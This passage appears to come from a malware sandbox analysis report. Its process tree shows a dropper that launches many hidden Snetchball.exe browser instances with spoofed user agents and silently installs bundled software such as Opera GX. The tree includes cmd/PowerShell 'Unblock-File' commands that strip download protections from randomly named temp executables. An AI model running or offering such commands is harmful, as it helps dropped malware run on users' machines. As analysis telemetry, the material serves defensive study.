                [depth 20] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 1012)
                  command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

                [depth 20] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5668)
                  command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

                [depth 20] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 4244)
                  command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                  behaviour: System Location Discovery: System Language Discovery

                [depth 20] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 3344)
                  command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3960 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵PID:5328
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3896 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵PID:3384
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=1196 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵PID:1912
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3888 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:819⤵PID:4532
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:5176
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:5288
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:5964
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:6080
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:3536
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
- System Location Discovery: System Language Discovery
PID:1672
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
- System Location Discovery: System Language Discovery
PID:5064
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵PID:2568
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵PID:2684
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵PID:5656
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3132 --field-trial-handle=2808,i,6899308284805131333,6803255543024129591,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵PID:5216
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4308 --field-trial-handle=2808,i,6899308284805131333,6803255543024129591,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵
- System Location Discovery: System Language Discovery
PID:5596
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
- System Location Discovery: System Language Discovery
PID:2684
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
- System Location Discovery: System Language Discovery
PID:4652
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵PID:5472
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵PID:928
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵PID:1232
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵PID:1252
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵PID:4980
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵PID:5576
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
- System Location Discovery: System Language Discovery
PID:5924
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵PID:3080
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2484 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵
- System Location Discovery: System Language Discovery
PID:3568
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3972 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:4792
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3588 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:1672
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=1944 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:388
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=2608 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:6012
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4104 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:5396
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3588 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:5196
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵PID:2848
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵PID:4888
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- System Location Discovery: System Language Discovery
PID:5524
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵PID:3428
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵PID:5280
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
PID:3424
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
PID:2728
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2244
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5816
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
PID:5424
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:3828
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:924
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:2940
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:5196
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:4844
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:6116
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:6056
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:1892
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3484
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:408
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3164 --field-trial-handle=2848,i,2714686665091331056,13396183525169070946,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3972 --field-trial-handle=2848,i,2714686665091331056,13396183525169070946,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5472
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8LFrg6Ok\Izaw0OcctowNceUeU.exeC:\Users\Admin\AppData\Local\Temp\8LFrg6Ok\Izaw0OcctowNceUeU.exe4⤵
- Executes dropped EXE
PID:1368 -
C:\Users\Admin\AppData\Local\Temp\is-8U4C5.tmp\Izaw0OcctowNceUeU.tmp"C:\Users\Admin\AppData\Local\Temp\is-8U4C5.tmp\Izaw0OcctowNceUeU.tmp" /SL5="$302A6,5349763,721408,C:\Users\Admin\AppData\Local\Temp\8LFrg6Ok\Izaw0OcctowNceUeU.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:396 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause shine-encoder_111516⤵PID:3004
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause shine-encoder_111517⤵PID:2708
-
-
-
C:\Users\Admin\AppData\Local\Shine Encoder 3.5.4\shineencoder.exe"C:\Users\Admin\AppData\Local\Shine Encoder 3.5.4\shineencoder.exe" -i6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:856
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22444⤵
- Program crash
PID:1376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22644⤵
- Program crash
PID:928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22124⤵
- Program crash
PID:3320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22644⤵
- Program crash
PID:1500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\uEKegsqV\6OOwtsS.exe"4⤵PID:3460
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\uEKegsqV\6OOwtsS.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22644⤵
- Program crash
PID:4876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22524⤵
- Program crash
PID:2704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 21044⤵
- Program crash
PID:2352
-
-
C:\Users\Admin\AppData\Local\Temp\uEKegsqV\6OOwtsS.exeC:\Users\Admin\AppData\Local\Temp\uEKegsqV\6OOwtsS.exe --silent --allusers=04⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3252 -
C:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exe --silent --allusers=0 --server-tracking-blob=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⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:4588 -
C:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=114.0.5282.202 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x71758c5c,0x71758c68,0x71758c746⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1864
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2564
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --vought_browser=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=4588 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_20241115045742" --session-guid=7e500a53-e0bf-4555-b8be-aad75f9f3394 --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=98050000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:4572 -
C:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4BCC2C29\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=114.0.5282.202 --initial-client-data=0x338,0x33c,0x340,0x308,0x344,0x70928c5c,0x70928c68,0x70928c747⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3260
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150457421\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150457421\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"6⤵
- Executes dropped EXE
PID:2956
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150457421\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150457421\assistant\assistant_installer.exe" --version6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4032 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150457421\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150457421\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=73.0.3856.382 --initial-client-data=0x2a4,0x2a8,0x2ac,0x280,0x2b0,0x324f48,0x324f58,0x324f647⤵
- Executes dropped EXE
PID:3292
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22524⤵
- Program crash
PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\zONamexw\0VWXDTifa42.exe"4⤵PID:5108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\zONamexw\0VWXDTifa42.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 12404⤵
- Program crash
PID:3128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 20204⤵
- Program crash
PID:4184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exe"4⤵PID:2772
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
